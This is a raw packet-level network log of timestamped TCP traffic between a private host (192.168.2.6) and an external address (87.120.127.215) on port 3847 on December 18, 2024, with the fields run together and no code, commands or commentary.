                                                                                                                                      Dec 18, 2024 19:28:33.397948027 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:33.517587900 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:33.517695904 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:33.638715982 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:33.944274902 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:33.946053982 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:33.946110964 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:33.946173906 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:33.946227074 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:33.947803020 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:33.947860003 CET499243847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:34.067302942 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:34.067421913 CET38474992487.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:38.945895910 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:39.065452099 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:39.065536976 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:39.065716982 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:39.185211897 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:40.342999935 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:40.343028069 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:40.343077898 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:40.352035999 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:40.477006912 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:40.765265942 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:40.765464067 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:40.885243893 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.224164963 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.226835966 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:41.346407890 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.346527100 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:41.466042042 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.758086920 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.760711908 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:41.881223917 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:41.881304026 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.003365040 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.287782907 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.296088934 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.296120882 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.296134949 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.296147108 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.296174049 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.296188116 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.304485083 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.304543972 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.304610014 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.312869072 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.312943935 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.315371037 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.315387964 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.315435886 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.320327997 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.320400953 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.320440054 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.328800917 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.328938007 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.328979015 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.337152004 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.382282972 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.419677973 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.419816971 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.419869900 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.488502979 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.488686085 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.488761902 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.492328882 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.493731976 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.493786097 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.493853092 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.502091885 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.502155066 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.502163887 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.510376930 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.510433912 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.510495901 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.518892050 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.518946886 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.519077063 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.527580023 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.527601004 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.527643919 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.535464048 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.535526991 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.535598040 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.543740988 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.543807030 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.543808937 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.552081108 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.552139044 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.552182913 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.561448097 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.561507940 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.561691046 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.567641973 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.567692041 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.567760944 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.572509050 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.572535038 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.572580099 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.577789068 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.577837944 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.577887058 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.682771921 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.682874918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.682931900 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.685156107 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.686099052 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.686147928 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.686208010 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.691083908 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.691122055 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.691132069 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.695979118 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.696032047 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.696084023 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.701101065 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.701159000 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.701178074 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.705609083 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.705660105 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.705717087 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.710140944 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.710195065 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.710247993 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.714144945 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.714190960 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.714195013 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.718198061 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.718244076 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.718341112 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.722347021 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.722402096 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.722462893 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.726403952 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.726468086 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.726521015 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.730489016 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.730535030 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.730580091 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.734663010 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.734709978 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.734746933 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.738686085 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.738724947 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.738734007 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.742873907 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.742904902 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.742944956 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.746897936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.747013092 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.747104883 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.750977039 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.751049042 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.751089096 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.755131006 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.755240917 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.755338907 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.759193897 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.759285927 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.759329081 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.763263941 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.763329029 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.763633966 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.767378092 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.767446995 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.767447948 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.771462917 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.771544933 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.771572113 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.775674105 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.775804996 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.775912046 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.779726028 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.779747009 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.779939890 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.783788919 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.783839941 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.783998013 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.787831068 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.787882090 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.874804974 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.874829054 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.874898911 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.876554966 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.876574039 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.876629114 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.880075932 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.881422997 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.881459951 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.881541014 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.884859085 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.884896994 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.884949923 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.888335943 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.888415098 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.888425112 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.891665936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.891778946 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.891792059 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.894934893 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.895077944 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.895136118 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.898044109 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.898098946 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.898150921 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.901160002 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.901235104 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.901294947 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.904226065 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.904284954 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.904345036 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.907433033 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.907485008 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.907493114 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.910077095 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.910135984 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.910186052 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.913000107 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.913075924 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.913172007 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.915833950 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.915885925 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.915930986 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.918654919 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.918703079 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.918771982 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.921500921 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.921555996 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.921570063 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.924391031 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.924433947 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.924582958 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.927202940 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.927248001 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.927253962 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.929969072 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.930036068 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.930079937 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.932817936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.932868004 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.932964087 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.935653925 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.935698986 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.935708046 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.938469887 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.938524008 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.938570023 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.941273928 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.941324949 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.941386938 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.944145918 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.944164038 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.944195986 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.946949959 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.946999073 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.947093964 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.949840069 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.949902058 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.949948072 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.952668905 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.952719927 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.952800989 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.955465078 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.955514908 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.955543995 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.958333015 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.958458900 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.958499908 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.961111069 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.961160898 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.961216927 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.963911057 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.963954926 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.964040041 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.966805935 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.966856956 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.966856956 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.969717026 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.969767094 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.969825983 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.972569942 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.972589016 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.972620964 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.975291967 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.975344896 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.975377083 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.978102922 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.978152037 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.978234053 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.980998039 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.981089115 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.981163025 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.983933926 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.983978033 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.984019995 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.986609936 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.986658096 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.986696959 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.989444971 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.989500046 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.989525080 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.992393017 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.992463112 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.992537022 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.995068073 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:42.995171070 CET499593847192.168.2.687.120.127.215
                                                                                                                                      Dec 18, 2024 19:28:42.995191097 CET38474995987.120.127.215192.168.2.6
                                                                                                                                      Dec 18, 2024 19:28:43.038517952 CET499593847192.168.2.687.120.127.215
